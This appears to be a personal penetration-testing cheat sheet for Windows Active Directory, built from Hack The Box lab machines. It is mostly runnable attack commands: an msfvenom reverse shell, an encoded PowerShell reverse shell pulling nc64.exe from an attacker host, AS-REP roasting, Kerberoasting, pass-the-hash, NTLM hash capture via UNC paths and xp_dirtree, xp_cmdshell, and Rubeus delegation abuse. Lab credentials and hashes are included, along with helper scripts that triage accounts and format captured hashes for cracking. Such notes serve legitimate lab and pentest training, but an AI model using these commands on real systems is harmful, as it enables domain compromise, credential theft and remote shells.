Windows checklist
before shell
Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
make the reverse shell command base64-encoded for powershell -EncodedCommand (UTF-16LE first, then base64; use echo -n so the trailing newline does not end up inside the payload):
echo -n 'cmd /c "\\10.10.14.6\share\nc64.exe -e cmd 10.10.14.6 443"' | iconv -f ascii -t utf-16le | base64 -w0
powershell -enc <payload>
Userenum
When we have SMB creds but can't do anything with them: | Flight
brute-force RIDs over LSARPC to get the domain SID and a list of users and groups:
impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb
Then feed the usernames to kerbrute userenum (see Kerberoasting below)
SMB
When SMB (139/445) is open, list the shares and our permissions on them:
smbmap -H 10.10.10.161
Connect to a share (or IPC$ for the named pipes) with a null session:
smbclient --no-pass //<IP>/<Folder>
Use Kerberos auth (-k, needs a TGT in KRB5CCNAME, see the Silver ticket section) when NTLM auth is disabled: | scrambled
impacket-smbclient -k -no-pass scrm.local/ksimpson:[email protected]
Ldap
Basic search (anonymous bind: empty DN and password):
ldapsearch -x -H ldap://10.10.10.161 -D "" -w "" -b 'DC=timelapse,DC=htb'
ldapsearch -x -H ldap://10.10.10.175 -D '' -w '' -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' > ldap_output
cat ldap_output | grep -i userprincipalname | cut -d " " -f 2 > User_p_names.txt
SAM account name:
ldapsearch -H ldap://10.10.10.161 -x -b DC=htb,DC=local "(objectClass=person)" | grep -i samaccountname
asrep-roast
impacket-GetNPUsers -dc-ip 10.10.10.161 -usersfile users.txt htb.local/
start with the basic enum against the rootDSE (no base DN needed; namingcontexts gives you the base DN for everything after):
ldapsearch -x -H ldap://10.10.11.158 -s base
ldapsearch -x -H ldap://10.10.11.24 -s base namingcontexts
and (-h host is the deprecated spelling of -H ldap://host):
ldapsearch -x -H ldap://10.10.10.248 -s base namingcontexts
Change the scope with -s: base (the entry itself), one (direct children), sub (whole subtree), children (subtree without the base entry)
ldapsearch -x -H ldap://10.10.10.161 -s base -b 'DC=htb,DC=local'
ldapsearch -x -H ldap://10.10.10.161 -D '' -w '' -b "DC=htb,DC=local"
batcat test.txt | grep -i userprincipalname | cut -d ":" -f 2 > u.txt
LDAP nmap
nmap -n -sV --script "ldap* and not brute" 10.10.11.168
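The grep | cut chains above break on two things ldapsearch does routinely: it base64-encodes values with unsafe characters (attr:: ...) and folds long values onto continuation lines. The parser below handles both and, as an extension beyond the page's username extraction, reads userAccountControl so the same dump also answers the later questions on this page: who is AS-REP roastable (DONT_REQ_PREAUTH), who has an SPN (kerberoastable), and who has TRUSTED_TO_AUTH_FOR_DELEGATION plus msDS-AllowedToDelegateTo (constrained delegation, see the delegation section). Added example, not code from the page; the LDIF is constructed sample data, not a real dump.

```python
import base64

# Constructed sample of ldapsearch output (not real data): a base64 (::) value,
# a folded continuation line, and ldapsearch's trailing "search:/result:" block.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
#

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
objectClass: person
sAMAccountName: svc-alfresco
userPrincipalName: svc-alfresco@htb.local
servicePrincipalName: HTTP/web.htb.local
userAccountControl: 4260352

dn: CN=Hope Sharp,CN=Users,DC=htb,DC=local
objectClass: person
sAMAccountName:: SFNoYXJw
userPrincipalName: HSharp@htb.local
description: Migrated from the legacy dom
 ain in 2019
userAccountControl: 512

dn: CN=spot,CN=Users,DC=htb,DC=local
objectClass: person
sAMAccountName: spot
userAccountControl: 16777728
msDS-AllowedToDelegateTo: cifs/dc01.htb.local

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""

# userAccountControl bits that matter for the attacks on this page
UAC_ACCOUNTDISABLE = 0x2
UAC_DONT_REQ_PREAUTH = 0x400000                  # AS-REP roastable
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition


def parse_ldif(text: str) -> list:
    """LDIF -> list of {attribute_lowercase: [values]} dicts.
    Handles folded lines (leading space) and base64 values (attr:: ...)."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]          # continuation of the previous line
        else:
            unfolded.append(line)
    entries, cur = [], {}
    for line in unfolded:
        if not line.strip():
            if "dn" in cur:                   # the search:/result: block has no dn, drop it
                entries.append(cur)
            cur = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):             # "attr:: base64"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        cur.setdefault(attr.lower(), []).append(value)
    if "dn" in cur:
        entries.append(cur)
    return entries


def triage(entries: list) -> dict:
    """Usernames plus the accounts worth a closer look, keyed by attack."""
    out = {"users": [], "asrep": [], "kerberoast": [], "delegation": []}
    for e in entries:
        if "person" not in [v.lower() for v in e.get("objectclass", [])]:
            continue
        name = e.get("samaccountname", [""])[0] or e.get("userprincipalname", [""])[0].split("@")[0]
        if not name:
            continue
        out["users"].append(name)
        uac = int(e.get("useraccountcontrol", ["0"])[0])
        if uac & UAC_ACCOUNTDISABLE:
            continue
        if uac & UAC_DONT_REQ_PREAUTH:
            out["asrep"].append(name)
        if e.get("serviceprincipalname"):
            out["kerberoast"].append(name)
        if uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION:
            out["delegation"].append((name, e.get("msds-allowedtodelegateto", [])))
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(triage(parse_ldif(SAMPLE_LDIF)), indent=2))
```

Feed it the file you saved from ldapsearch instead of SAMPLE_LDIF; the "users" list is what goes to kerbrute / GetNPUsers, and disabled accounts are skipped because the KDC refuses them anyway.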
usernames
Look for legacy password attributes too (Cascade kept one, base64-encoded, in a custom attribute): | Cascade
Just grep the dump for pwd (case-insensitive)
Nmap
enumerate users without a user list (the script ships its own small default list):
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='streamIO.htb'" 10.10.11.158
with a username list:
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='streamIO.htb',userdb=users.txt 10.10.11.158
Kerberoasting
original article
Kerberoasting is a post-exploitation attack technique that attempts to obtain a password hash of
an Active Directory account that has a Service Principal Name (“SPN”).
In such an attack, an authenticated domain user requests a Kerberos ticket for an SPN. The
retrieved Kerberos ticket is encrypted with the hash of the service account password affiliated
with the SPN. (An SPN is an attribute that ties a service to a user account within the AD). The
adversary then works offline to crack the password hash, often using brute force techniques.
Step1
Get the service and user principal names
impacket-get
Step2
Enumerate users and dump AS-REP hashes for any that have pre-auth disabled:
kerbrute userenum --dc <ip> -d <domain.name> <wordlist of users>
NOTE: when cracking the hash, check the etype (the number after $krb5asrep$ or $krb5tgs$) against the hashcat example-hashes page (google: hashcat example hashes): 18200 is AS-REP etype 23, 13100 is TGS-REP etype 23. kerbrute asks for AES by default, so you usually get an etype 18 hash; ask for the RC4 one instead:
kerbrute userenum --dc <ip> -d <domain.name> <wordlist of users> --downgrade
OR
using impacket (its output is already the $krb5asrep$23$ format):
impacket-GetNPUsers -usersfile <wordlist of users> -dc-ip <ip> <domain.name>/
Step3
impacket-GetUserSPNs <domain.local>/<username>:<password> -dc-ip <ip> -request
we get a $krb5tgs$23$ hash per account with an SPN (hashcat -m 13100); after cracking, verify the creds:
crackmapexec smb <ip> -u "<username from hash>" -p "<password from hash cracked>"
then dump the shares:
crackmapexec smb <ip> -u "<username from hash>" -p "<password from hash cracked>" --shares
NOTE: Try brute-forcing usernames from seclists, maybe we find some valid ones | manager
kerbrute userenum --dc 10.10.11.236 -d manager.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
ASREP-Roasting
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users -o hash
Always try with a user file, maybe it hits something | sauna
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
Bloodhound from outside
There are scenarios where we have creds that don't get us in anywhere; that is a sign to enumerate the domain with bloodhound and look for a path. | Intelligence
bloodhound-python -c ALL -u Ted.Graves -p Mr.Teddy -dc intelligence.htb -d intelligence.htb -ns 10.10.10.248
Web
On dir brute-force: make sure to add extensions too (gobuster takes them comma-separated): | bounty
gobuster dir -u http://10.10.10.93/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x aspx,asp,txt,html -t 50
Pass the hash (no cracking needed, -hashes takes LMHASH:NTHASH):
impacket-wmiexec -hashes '365ca60e4aba3e9a71d78a3912caf35c:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 [email protected]
the -hashes value is the LM:NT pair as secretsdump prints it:
365ca60e4aba3e9a71d78a3912caf35c:823452073d75b9d1cf70ebdf86c7f98e
Whenever you see LFI (or anything else on Windows that opens a path you supply), point it at a UNC path on your SMB server and grab the Net-NTLMv2 hash it prints (hashcat -m 5600): | pov
impacket-smbserver share -smb2support /home/bali/htb/pov
Generating an NT hash from a password (MD4 over the UTF-16LE password; on OpenSSL 3 put -provider legacy -provider default before -md4 or dgst refuses MD4):
iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
Get the domain SID (it is in the PAC of the service ticket getPac requests for the target user):
impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson
Hash Cracking
Crackmapexec
check creds | timelapse
crackmapexec smb 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
SMB
crackmapexec smb 10.10.10.161 -u 'username' -p 'password'
LDAP
crackmapexec ldap 10.10.10.161 -u svc-alfresco -p 's3rvice'
command execution
SMB
crackmapexec smb 10.10.10.161 -u svc-alfresco -p 's3rvice' -x "whoami"
winrm
crackmapexec winrm 10.10.10.161 -u svc-alfresco -p 's3rvice' -x "whoami"
evil winrm
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
DNS
AXFR {zone transfer: dumps the whole zone if the server allows it}
dig axfr @10.10.10.175 egotistical-bank.local
method Silver ticket (first step: when NTLM auth is disabled, get a TGT over Kerberos with the user's NT hash; the LM part can be left empty): | scrambled
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
get the NT hash of the password from an online NTLM generator (just paste the password) or with the openssl one-liner above
install klist via:
apt-get install heimdal-clients
point the impacket tools at the saved ccache, then check it with klist:
export KRB5CCNAME=/home/akshad/hack-the-box/retired-machines/windows-box/Scrambled/ksimpson.ccache
klist
then use the ticket with -k -no-pass:
impacket-smbclient -k -no-pass scrm.local/ksimpson:[email protected]
Mssql
connect:
impacket-mssqlclient -windows-auth manager.htb/operator:[email protected]
Exec
xp_dirtree lists a directory; pointed at a UNC path it makes the SQL Server service account authenticate to your SMB server, so you capture its Net-NTLMv2 hash. Have the share up before running it:
impacket-smbserver share -smb2support /tmp/
EXEC xp_dirtree '\\<your-ip>\share', 1, 1;
list directories:
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
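What impacket-smbserver prints when the LFI trick above (pov) or this xp_dirtree trick fires is the NTLMSSP exchange reduced to one hashcat -m 5600 line. The parser below does that reduction from the raw CHALLENGE (type 2) and AUTHENTICATE (type 3) messages, and refuses a 24-byte response because that is NTLMv1 (-m 5500). Added example, not code from the page or from impacket; the two messages are constructed in the block so it runs offline, and the user, domain, challenge and blob bytes are made up.

```python
import struct

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001


def _field(msg: bytes, off: int) -> bytes:
    """NTLM variable field descriptor: Len(2) MaxLen(2) BufferOffset(4), little-endian."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_challenge(msg: bytes) -> bytes:
    """CHALLENGE_MESSAGE (type 2) sent by our server: ServerChallenge sits at offset 24."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    return msg[24:32]


def parse_authenticate(msg: bytes) -> dict:
    """AUTHENTICATE_MESSAGE (type 3) sent by the victim: user, domain, LM and NT responses."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    return {
        "lm": _field(msg, 12),
        "nt": _field(msg, 20),
        "domain": _field(msg, 28).decode(enc),
        "user": _field(msg, 36).decode(enc),
    }


def netntlmv2_line(challenge_msg: bytes, auth_msg: bytes) -> str:
    """hashcat -m 5600 / john netntlmv2 line: user::DOMAIN:ServerChallenge:NTProofStr:blob.
    The blob (client challenge, timestamp, target info) is everything after the 16-byte NTProofStr."""
    a = parse_authenticate(auth_msg)
    if len(a["nt"]) <= 24:
        raise ValueError("24-byte NT response is NTLMv1, crack with -m 5500 instead")
    challenge = parse_challenge(challenge_msg).hex()
    return f"{a['user']}::{a['domain']}:{challenge}:{a['nt'][:16].hex()}:{a['nt'][16:].hex()}"


# --- constructed messages so the example runs offline (not a real capture) ---

def build_challenge(server_challenge: bytes, flags: int = NTLMSSP_NEGOTIATE_UNICODE) -> bytes:
    hdr = 48   # Signature..TargetInfoFields, no Version block
    empty = struct.pack("<HHI", 0, 0, hdr)
    return (b"NTLMSSP\x00" + struct.pack("<I", 2) + empty                        # TargetName
            + struct.pack("<I", flags) + server_challenge + bytes(8) + empty)   # TargetInfo


def build_authenticate(user: str, domain: str, nt_response: bytes,
                       flags: int = NTLMSSP_NEGOTIATE_UNICODE) -> bytes:
    hdr = 64   # Signature..NegotiateFlags, no Version/MIC
    payload, descriptors = b"", b""
    # header field order: LM, NT, Domain, User, Workstation, EncryptedRandomSessionKey
    for blob in (b"", nt_response, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""):
        descriptors += struct.pack("<HHI", len(blob), len(blob), hdr + len(payload))
        payload += blob
    return b"NTLMSSP\x00" + struct.pack("<I", 3) + descriptors + struct.pack("<I", flags) + payload


SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
NT_PROOF = bytes.fromhex("aa" * 16)
BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("deadbeefcafef00d") + bytes(4)

if __name__ == "__main__":
    ch = build_challenge(SERVER_CHALLENGE)
    au = build_authenticate("svc_mssql", "HTB", NT_PROOF + BLOB)
    print(netntlmv2_line(ch, au))
```

Real captures carry a longer blob (the AV pairs with the target's NetBIOS and DNS names); the split is the same, so the output drops straight into hashcat -m 5600.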
to execute commands (enable_xp_cmdshell is impacket-mssqlclient's built-in helper that runs the sp_configure steps; RECONFIGURE applies them): | scrambled
enable_xp_cmdshell
RECONFIGURE
Basic commands:
1. List Databases:
MySQL: SHOW DATABASES;
MSSQL: SELECT name FROM master.sys.databases;
2. List Tables:
MySQL: SHOW TABLES;
MSSQL: SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';
3. Use Database:
MySQL: USE database_name;
MSSQL: USE database_name;
check (mssql): the current user's privileges
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
Always check for linked servers , they might have some info there: | poo
select srvname from sysservers;
we can use openquery, or EXECUTE ... AT (needs RPC Out enabled on the link), to run queries on the linked servers:
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
find sysadmin in mssql:
SELECT name FROM master..syslogins WHERE sysadmin = '1'
Kerberos delegation abuse:
If you have compromised a user account or a computer (machine account) that has Kerberos constrained delegation enabled, it's possible to impersonate any domain user (including administrator, unless that user is in Protected Users or marked "sensitive and cannot be delegated") and authenticate to a service that the account is trusted to delegate to.
BEST ARTICLE I'VE READ ON THIS SO FAR: abuse_kerberos_from_linux | HTB: Intelligence
From Outside | Intelligence
We need:
1. SPN {can get from bloodhound or mentioned above.}
2. Hash {refer: Intelligence}
3. DC ip
4. whom to impersonate
impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate administrator intelligence.htb/svc_int
we had to sync time with the DC after the error KRB_AP_ERR_SKEW(Clock skew too great) (Kerberos tolerates 5 minutes of skew by default):
ntpdate 10.10.10.248
if in virtualbox, stop the guest time sync first, then run ntpdate:
sudo service virtualbox-guest-utils stop
From Inside
User Account
Prerequisites
Hunting for user accounts that have Kerberos constrained delegation enabled (PowerView):
Get-NetUser -TrustedToAuth
In the article's example, the user spot is allowed to delegate, in other words to impersonate any user and authenticate to the file system service (CIFS) on the domain controller DC01.
NOTE:
The user has to have the TRUSTED_TO_AUTH_FOR_DELEGATION flag (0x1000000 in userAccountControl) for it to be able to authenticate to the remote service on behalf of someone else (protocol transition).
The attribute msDS-AllowedToDelegateTo lists the SPNs of the services the user spot is trusted to delegate to (impersonate other domain users and authenticate to); in this case it says spot may authenticate to the CIFS service on DC01 on behalf of any other domain user.
Requesting our own TGT through the delegation trick (no admin rights needed):
Rubeus.exe tgtdeleg
Using rubeus, we can now request a TGS for [email protected] , who will be allowed to authenticate to CIFS/dc01.offense.local :
/ticket is the base64 TGT we got from rubeus's tgtdeleg
Rubeus.exe s4u
/ticket:doIFCDCCBQSgAwIBBaEDAgEWooIEDjCCBAphggQGMIIEAqADAgEFoQ8bDU9GRkVOU0UuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0
Z3QbDU9GRkVOU0UuTE9DQUyjggPEMIIDwKADAgESoQMCAQKiggOyBIIDro3ZCHDaVettnJseuyFJMK+Il4GAtWVAHPAq02cnHmOs3R2KcrOW
pf3YbtnTD7fB+rKdZ8aElgloJO+v4XVM2NgyOVIia0MzNToDrK1ynhC70aApbag+ykvUFTDeG9NjhE3TVk3+F99vWboy6hhc9AmRUJwHFuqL
C4djtL2PtQSpgWWL42W5eONlIZkc5XK0kWkC/AvivuuPOHs9aEy3g38hoBeApZE8NqT7mGKz5JHLwV5TyUgo87s6fFVSn8LHK8CI6G0x2DRh
xxu04q0qnRXhLJ5S0MyJgJj6YDVESvCUgep5MXR+OYp0EGdVP8qQJK+x6m4rmr0Y3nd1Klmc+xDnLSC11ay7I8VevqhCBCZ64c+HQow4qcMT
a/agxyOXqK42ynUl0GJtrLV7nIIrp+J2e5PECDUXIjKFkGnp6HZDNfzYAGL3XxyyT2JYdneOS3VUzJQyEctjuQMdVA0wB8NrRqDVdqSNBSOy
BwpB3/FWzdHNYxztRmVT+Yz6qJCU4SYHIzHUE5dqHjvhjPSwgAkhS/QNApxtWvyba8iwCSnyualuhK46LS0pkt1IIQT0Y+qw80oL6mzjD+rx
fKgR4B9hI6Imw9zTT5rjlRNMjWEy78izLtRB+ulzqdkZCUMA6zswWjq1BTmWzZX0LAZ+QAWQJPzoRVsqOcZCZwo/aWwmO1s9v5TLRRMLTAvk
16PQW3z9NHix2Io9sObH8cb7gVrB+u2Q545Qwekl0uwP5mCar6swU2oEkxBm5DZvLsbZTcGl+KzGxqq/zhEJm3EceLuwIY81z8aYu13c6AsY
ETs9VevdEVysylpNL7EcHu8iXsoE5JmLx7OrcPR9WfeFWxRDp+1CVDijOI5VOS51+JpkEvcXFmfZueqLTJ66VGJgQaP7A3B//Y40ur5nSXyv
EmIKgzdeqPLpGa5GPiNs/rYFmMlxwEX+yVFB5bPYgoszr3Crjsvs6Q/vdr36NoWqI9/11Nurzeeknt+k8sUV26URnQVkecW4yJFQ2TZwYCJ1
k9h4cr96csJ9HhJO46UBye/8oqlqJXKnYY3JpaZiXWK77kG7BqhM6oPl+oEIbX2ycj/gHesxREvP7/vYINk33KbOSxXTAi3Je3wbZP7N+3B9
Lz04m8Xi6nGeIVsZiMyODpnJVX5Bgq+3cGaSty0v+fIfqMHDwuKhOS7h1MGLJduhWh3b21ytDfzn73yyCPskFee2ckAomlAgxMzg8ZatmZDL
TxfUenJ+EnrJgkYee6OB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIN2JDvcjQZeMR+7giMsawE1vG/Cmw9IF
IV7ZYwaELMqaoQ8bDU9GRkVOU0UuTE9DQUyiETAPoAMCAQGhCDAGGwRzcG90owcDBQBgoQAApREYDzIwMTkwODE3MTMyMDU2WqYRGA8yMDE5
MDgxNzIzMDY0MFqnERgPMjAxOTA4MjQxMzA2NDBaqA8bDU9GRkVOU0UuTE9DQUypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU9GRkVOU0UuTE9D
QUw= /impersonateuser:administrator /domain:offense.local /msdsspn:cifs/dc01.offense.local
/dc:dc01.offense.local /ptt
We've got the impersonated TGS ticket for the administrator account (injected into the session by /ptt):
klist now shows it, and we can access the domain resource:
dir \\dc01.offense.local\c$